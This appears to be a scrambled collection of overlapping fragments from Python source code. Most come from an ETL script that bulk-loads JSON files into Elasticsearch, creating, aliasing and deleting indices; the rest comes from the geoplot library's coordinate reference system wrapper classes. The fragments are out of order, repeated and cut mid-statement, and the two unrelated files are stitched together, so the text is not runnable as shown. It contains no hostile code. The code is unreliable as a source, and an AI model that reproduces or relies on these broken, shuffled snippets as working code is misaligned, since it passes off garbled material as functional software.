"check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_'", "{} Elasticsearch documents.\\n\" \"=> Check the logs ({}) for more", "\"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection", "create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name) for", "check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*',", "if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name,", "and test connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try:", "indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda", "\"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name))", "not os.path.exists(bulk_dir): raise Exception('No json bulk folder found in '", "indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\"", "document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document =", "node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except", "into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError(", "info = es_client.info() logger.debug('Connected to node \"{}\" of cluster \"{}\"", "source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action],", "mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body))", "import traceback import elasticsearch from etl.common.store import list_entity_files from etl.common.utils", "= 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True)", "\"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch", "process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types", "logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting", ".format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'],", "and Elasticsearch document transformation' ' before trying to launch the", "Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier'] action =", "index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full", "ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch']", "logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name))", "raise Exception('No json bulk folder found in ' + bulk_dir)", "\"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError", "your configuration'.format(url)) raise e return es_client def check_error(response): if response.get('errors'):", "if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory:", "elasticsearch from etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path,", "document_type, file_path in bulk_files: if document_type in index_by_document: base_index_name, index_name", "def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if", "\"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file", "set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types)", "document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name = base_index_name", "= os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json bulk", "= set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types =", "json import os import time import traceback import elasticsearch from", "you have run the BrAPI extraction and Elasticsearch document transformation'", "as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch", "old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as", "os import time import traceback import elasticsearch from etl.common.store import", "bulk files into elasticsearch import json import os import time", "config['sources'] for (source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name])", "+ str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk", "if not mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name,", "connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: info =", "and deleting old indices...\") for document_type, (base_index_name, index_name) in index_by_document.items():", "in ' + bulk_dir) sources = config['sources'] for (source_name, source)", "etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first,", "config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No", "replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch and test connection", "es_client.info() logger.debug('Connected to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'],", "base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return", "os.path.exists(bulk_dir): raise Exception('No json bulk folder found in ' +", "error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e", "not mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern))", "log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier']", "action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config =", "config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name", "= {'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings']", "alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client,", "action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log',", "old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except", "load_config, document_type, base_index_name, logger) index_name = base_index_name + '-d' +", "def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'})", "response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name))", "= es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda i:", "body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk", "'Please make sure you have run the BrAPI extraction and", "to launch the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types", "= list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or", "in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type}", "index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices =", "if not os.path.exists(bulk_dir): raise Exception('No json bulk folder found in", "index_name = base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger)", "logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger):", "launch the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types =", "\"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name", "document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern =", "index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def", "aliases and deleting old indices...\") for document_type, (base_index_name, index_name) in", "sure you have run the BrAPI extraction and Elasticsearch document", "init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected", "(source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source, config,", "in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger)", "raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n' 'Please make", "' + bulk_dir) sources = config['sources'] for (source_name, source) in", "file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as", "index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type,", "ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def", "logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir):", "def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing", "\"=> Check the logs ({}) for more details.\" .format(source_name, log_file))", "es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name,", "time import traceback import elasticsearch from etl.common.store import list_entity_files from", "from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception):", "index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger):", "= replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config,", "check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def", "file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in", "Check the logs ({}) for more details.\" .format(source_name, log_file)) def", "if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index", "params={'h': 'index'}) index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return", "log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir):", "source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name =", "= config['sources'] for (source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir,", "create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch and", "create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger)", "make sure you have run the BrAPI extraction and Elasticsearch", "logger) new_index, *old_indices = get_indices(es_client, base_index_name) for old_index in old_indices[1:]:", "raise e return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response)", "files into elasticsearch import json import os import time import", "' before trying to launch the transformation process.' .format(source_bulk_dir)) bulk_files", "'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name =", "list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config,", "all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with", ").lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name = base_index_name +", "load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file", "import json import os import time import traceback import elasticsearch", "details.\" .format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir =", "the BrAPI extraction and Elasticsearch document transformation' ' before trying", "old indices...\") for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name,", "the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first,", "= index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and", "document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower()", "str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\")", "ElasticSearchException(Exception): pass # Init Elasticsearch and test connection def init_es_client(url,", "for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger)", "e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\"", "sources = config['sources'] for (source_name, source) in sources.items(): source_bulk_dir =", "template_pattern = base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not", "document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with template", "bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and deleting old", "Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e return", "indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r')", "as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger):", "logger.debug('Connected to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'],", "Init Elasticsearch and test connection def init_es_client(url, logger): es_client =", "timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for", "with template mapping...\") timestamp = int(time.time()) for document_type in document_types:", "logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise", "\\'{}\\'.\\n' 'Please make sure you have run the BrAPI extraction", "as e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your", "index_name logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if document_type", "template_name = 'template_elixir_' + base_index_name template_pattern = base_index_name + '-d*'", "create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name,", "bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document", "pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping} if", "\"\"\" Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier'] action", "except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading", "index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name)", "es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template \"{}\" on pattern", "'No such file or directory: \\'{}\\'.\\n' 'Please make sure you", "logger): template_name = 'template_elixir_' + base_index_name template_pattern = base_index_name +", "+ base_index_name template_pattern = base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\")", "= list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source,", "= base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files:", "'-d*', params={'h': 'index'}) index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True)", "get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names", "logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template':", "traceback import elasticsearch from etl.common.store import list_entity_files from etl.common.utils import", "logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e,", "source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source, config, source_bulk_dir,", "elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No", "document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with template mapping...\") timestamp", "test connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: info", "'{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise", "open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name,", "os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json bulk folder", "logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=>", "in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name,", "load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing", "create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for", "first, replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch and test", "import os import time import traceback import elasticsearch from etl.common.store", "*old_indices = get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index,", "<reponame>bilalelhoudaigui/plant-brapi-etl-data-lookup-gnpis # Load json bulk files into elasticsearch import json", "Elasticsearch document transformation' ' before trying to launch the transformation", "base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client,", "base_index_name, logger) index_name = base_index_name + '-d' + str(timestamp) create_index(es_client,", "'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json bulk folder found", "index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(),", "\"{}\".\\nPlease check your configuration'.format(url)) raise e return es_client def check_error(response):", "base_index_name, logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name,", "template mapping...\") timestamp = int(time.time()) for document_type in document_types: base_index_name", "return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body =", "+ '-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name,", "= init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try:", "Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', ''))", "delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e:", "for more details.\" .format(source_name, log_file)) def main(config): log_dir = config['log-dir']", "base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names =", "for old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name))", "configuration'.format(url)) raise e return es_client def check_error(response): if response.get('errors'): raise", "= es_client.info() logger.debug('Connected to node \"{}\" of cluster \"{}\" on", "index with template mapping...\") timestamp = int(time.time()) for document_type in", "deleting old indices...\") for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client,", "FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n' 'Please make sure", "for (source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source,", "template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping} if 'index-settings' in", "new_index, *old_indices = get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client,", "etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass", "before trying to launch the transformation process.' .format(source_bulk_dir)) bulk_files =", "'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client,", "Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-'", "logger): es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to", "elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check", "'template_elixir_' + base_index_name template_pattern = base_index_name + '-d*' mapping =", "Elasticsearch and test connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url])", "index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name) for old_index", "def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client,", "logger) index_name = base_index_name + '-d' + str(timestamp) create_index(es_client, index_name,", "with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client,", "def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client,", "Loading {} Elasticsearch documents.\\n\" \"=> Check the logs ({}) for" ]
[ "outputs. For the list of Cartopy CRS objects this module", "instance parameter, which together control the center of the plot,", "---------- `load` : Return a Cartopy CRS initialized with defaults", "with empty `df` and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save", "object without having first called ``load``: most prominently, when creating", "provided in each of the ``geoplot`` top-level plot functions; each", "does, exactly, are not important: it suffices to know that", "``geoplot.crs`` object called by ``matplotlib``, it silently swaps itself out", "method is a better way: when a ``geoplot.crs`` object called", "AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI", "as this projection is centered on the North Pole!). A", "name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM',", "EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for name in", "them to the ``_generic_load`` method here. We then in turn", "on the North Pole!). A top-level centerings method is provided", "projection instance The instance in question (self, in the method", "\"\"\" A meta-method which abstracts the internals of individual projections'", "provided by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def", "(using the function defined immediately above). Since we control what", "prominently, when creating a plot containing subplots, the \"overall\" projection", "the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\"", "better way: when a ``geoplot.crs`` object called by ``matplotlib``, it", "of executing ``_as_mpl_axes`` on that object instead. \"\"\" proj =", "parameter, implying that latitude is fixed (as indeed it is,", "functions from this list relevent to this particular instance and", "The GeoDataFrame which has been passed as input to the", "``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance whose appropriate", "http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas as gpd", "geopandas as gpd class Base: # TODO: RotatedPole \"\"\" Generate", "function body. But there are also use cases outside of", "that function's ``_as_mpl_axes`` instead. Parameters ---------- proj : geoplot.crs projection", "if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS", "(LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide',", "``geoplot`` top-level plot functions; each of the projection wrapper classes", "not already provided by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings,", "use cases outside of our control in which we are", "self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a", "def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a projection via", "with defaults from the `centerings` dictionary, overridden by initialization parameters.", "``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs`` objects meant", "class name. Parameters ---------- `load` : Return a Cartopy CRS", "class LatitudeCentering(Filtering): \"\"\"For a CRS that centers by latitude.\"\"\" filter_", "from this list relevent to this particular instance and passes", "suffices to know that every ``cartopy`` coordinate reference system object", "twice-instantiation loading in the first place. centerings: dict A dictionary", "plot, while the North Pole Stereo projection has only a", "method is provided in each of the ``geoplot`` top-level plot", "`centerings` filtered to keys in `self.filter_`.\"\"\" return super().load( df, {key:", "import geopandas as gpd class Base: # TODO: RotatedPole \"\"\"", "that initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df,", "control what ``geoplot`` does at execution, we gracefully integrate this", "Pole!). A top-level centerings method is provided in each of", "{}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\", "and centering of the data occurs automatically (using the function", "get around this by using ``cartopy.crs`` objects instead, but this", "parameters that initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self,", "the first place. centerings: dict A dictionary containing names and", "df, {key: value for key, value in centerings.items() if key", "filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that centers", "top level. This data is needed to calculate reasonable centering", "centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\", "to be used as parameters to the ``projection`` parameter of", "when creating a plot containing subplots, the \"overall\" projection must", "of all front-end ``geoplot`` outputs. For the list of Cartopy", "input to the plotter at the top level. This data", "object has one. When we pass a ``geoplot.crs`` crs object", "'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic", "here. We then in turn execute these functions to get", "on ``cartopy.crs`` objects meant to be used as parameters to", "expects to get something with a callable ``as_mpl_axes`` method. The", "a ``geoplot.crs`` object called by ``matplotlib``, it silently swaps itself", "contains both ``central_longitude`` and ``central_latitude`` instance parameter, which together control", "name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine',", "to calculate reasonable centering variables in cases in which the", "{key: value for key, value in centerings.items() if key in", "'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,),", "Return a Cartopy CRS initialized with defaults from the `centerings`", "= tuple( type(name, (Base,), {}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant',", "``cartopy.crs``.*name* where *name* matches the instance's class name. Parameters ----------", "passed as input to the plotter at the top level.", "to reasonable defaults wherever not already provided by the user.", "Certain projections have certain centering parameters whilst others lack them.", "TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where *name* matches", "projections' load procedures. Parameters ---------- df : GeoDataFrame The GeoDataFrame", "``cartopy.crs`` objects instead, but this is inelegant. This method is", "This method is a better way: when a ``geoplot.crs`` object", "fixed (as indeed it is, as this projection is centered", "whilst others lack them. For example, the geospatial projection contains", "top-level plot functions; each of the projection wrapper classes defined", ") class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by longitude.\"\"\"", "having first called ``load``: most prominently, when creating a plot", "TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,),", "the North Pole!). A top-level centerings method is provided in", "occurs automatically (using the function defined immediately above). Since we", "swaps itself out for a vanilla version of its ``cartopy.crs``", "object to a ``geoplot`` function, the loading and centering of", "the top level. This data is needed to calculate reasonable", "using ``cartopy.crs`` objects instead, but this is inelegant. This method", "objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import", "a ``cartopy.crs`` object instance whose appropriate instance variables have been", "precise details of what this method does, exactly, are not", "CRS objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\"", "'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic =", "Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple(", "the user does not already provide them; which is, incidentally,", "centerings: dict A dictionary containing names and centering methods. Certain", "parameter, which together control the center of the plot, while", "``_as_mpl_axes`` for `self.load` called with empty `df` and `centerings`. \"\"\"", "provided a projection via a ``projection`` keyword argument, it expects", "is, as this projection is centered on the North Pole!).", "where *name* matches the instance's class name. Parameters ---------- `load`", "certain centering parameters whilst others lack them. For example, the", "of our control in which we are forced to pass", "names and centering methods. Certain projections have certain centering parameters", "passes them to the ``_generic_load`` method here. We then in", "which abstracts the internals of individual projections' load procedures. Parameters", "*name* matches the instance's class name. Parameters ---------- `load` :", "variables have been set to reasonable defaults wherever not already", "coordinate reference system classes, wrappers on ``cartopy.crs`` objects meant to", "when a ``geoplot.crs`` object called by ``matplotlib``, it silently swaps", "to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas as", "mirror, and calls that function's ``_as_mpl_axes`` instead. Parameters ---------- proj", "there are also use cases outside of our control in", ": geoplot.crs projection instance The instance in question (self, in", "behind all of this funny twice-instantiation loading in the first", "a plot containing subplots, the \"overall\" projection must be pre-loaded.", "every ``cartopy`` coordinate reference system object has one. When we", "Cartopy CRS objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html.", "return super().load( df, {key: value for key, value in centerings.items()", "centering variables in cases in which the user does not", "called ``load``: most prominently, when creating a plot containing subplots,", "in cases in which the user does not already provide", "variables in cases in which the user does not already", "that `load`s with `centering` restricted to keys in `self.filter_`.\"\"\" def", "= type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ 